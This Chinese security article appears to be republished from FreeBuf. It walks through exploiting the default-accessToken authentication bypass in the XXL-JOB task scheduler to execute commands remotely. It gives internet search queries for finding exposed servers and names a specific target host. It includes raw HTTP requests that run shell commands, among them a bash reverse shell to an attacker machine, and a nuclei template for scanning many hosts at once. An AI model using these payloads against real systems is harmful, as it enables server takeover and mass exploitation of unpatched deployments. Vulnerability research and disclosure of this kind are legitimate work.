XXL-JOB默认accessToken身份绕过RCE漏洞
2024-11-27 11:40:56 Author: www.freebuf.com(查看原文) 阅读量:0 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

​XXL-JOB 是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。XXL-JOB 默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,从而获取服务器权限。经分析和研判,该漏洞利用难度低,可导致远程代码执行。

漏洞复现

步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....

# 搜索语法 fofa
"invalid request, HttpMethod not support" && port="9999"
# 搜索语法-360Quake
html_hash: "1b5af7109cb2b269eb02ba1ef4629bd8"
# 检测目标
http://uat.cxmssc.joydigitseniorliving.com:9999

步骤二:开启代理并打开BP对其首页进行抓包拦截....修改请求包内容。返回{"code":200}且DNSlog存在访问记录,即存在漏洞。

POST /run HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 376
Content-Type: application/json
XXL-JOB-ACCESS-TOKEN: default_token
Accept-Encoding: gzip

{
  "jobId": 181584,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 187270,
  "logDateTime": 116989791110,
  "glueType": "GLUE_SHELL",
  "glueSource": "ping x.x.x.x",
  "glueUpdatetime": 116989791110,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

每次发送可以把jobId值改一下

步骤三:VPS监听一个端口,使用命令即可反弹shell。

POST /run HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 405
Content-Type: application/json
XXL-JOB-ACCESS-TOKEN: default_token
Accept-Encoding: gzip

{
  "jobId": 183125,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 187270,
  "logDateTime": 116989791110,
  "glueType": "GLUE_SHELL",
  "glueSource": "/bin/bash -i >& /dev/tcp/ip/port 0>&1",
  "glueUpdatetime": 116989791110,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

批量脚本

id: xxl-job-executor-default-accesstoken-rce

info:
  name: XXL-JOB默认accessToken身份绕过RCE
  author: wuha
  severity: high
  description: XXL-JOB 默认 accessToken 身份绕过,可导致 RCE
  metadata:
    max-request: 1
    verified: true
    fofa-query: app="XXL-JOB"
  tags: xxl-job,rce

variables:
  randjobid: "{{rand_int(999,999999)}}"
  datetime: '{{date_time("%Y-%M-%D %H:%m:%s")}}'
  unix_time: '{{date_time("{{datetime}}",unix_time())}}'
http:
  - raw:
      - |
        @timeout: 25s
        POST /run HTTP/1.1
        Host: {{Host}}:9999
        XXL-JOB-ACCESS-TOKEN: default_token
        Content-Type: application/json

        {
          "jobId": {{randjobid}},
          "executorHandler": "demoJobHandler",
          "executorParams": "demoJobHandler",
          "executorBlockStrategy": "COVER_EARLY",
          "executorTimeout": 0,
          "logId": {{randjobid}},
          "logDateTime": {{unix_time}},
          "glueType": "GLUE_SHELL",
          "glueSource": "ping {{Host}}.{{randjobid}}.{{interactsh-url}}",
          "glueUpdatetime": {{unix_time}},
          "broadcastIndex": 0,
          "broadcastTotal": 0
        }

    req-condition: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"</code></pre>
<span class="cke_reset cke_widget_drag_handler_container"><img class="cke_reset cke_widget_drag_handler" data-cke-widget-drag-handler="1" height="15" role="presentation" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" title="点击并拖拽以移动" width="15">

本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022


文章来源: https://www.freebuf.com/vuls/416273.html
如有侵权请联系:admin#unsafe.sh